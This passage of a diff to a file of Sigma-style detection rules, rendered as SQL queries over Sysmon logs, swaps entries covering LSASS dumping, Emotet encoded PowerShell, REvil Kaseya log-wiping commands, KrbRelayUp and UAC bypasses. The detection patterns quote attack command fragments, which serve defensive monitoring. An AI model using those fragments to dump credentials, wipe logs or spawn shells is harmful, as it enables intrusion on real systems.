CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", + "id": "47e4bab7-c626-47dc-967b-255608c9a920", + "status": "experimental", + "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_findstr_recon_everyone.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", "attack.defense_evasion", - "attack.t1562.004" + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "WMIC Remote Command Execution", - "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", + "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", + "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", "status": "experimental", - "description": "Detects the execution of WMIC to query information on a remote system", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_remote_execution.yml" + "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Audio Capture via PowerShell", + "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "status": "test", + "description": "Detects audio capture via PowerShell Cmdlet.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\' OR CommandLine LIKE '%Toggle-AudioDevice%' ESCAPE '\\' OR CommandLine LIKE '%Get-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Set-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Write-AudioDevice %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_powershell_audio_capture.yml" }, { - "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", - "id": "de587dce-915e-4218-aac4-835ca6af6f70", - "status": "test", - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_add_run_key.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Password Provided In Command Line Of Net.EXE", - "id": "d4498716-1d52-438f-8084-4a603157d131", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Detects a when net.exe is called with a password in the command line", - "author": "Tim Shelton (HAWK.IO)", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_use_password_plaintext.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Recon Information for Export with Command Prompt", - "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", - "status": "experimental", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tree.com' ESCAPE '\\' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\doskey.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_recon.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", + "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the features listed in the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND 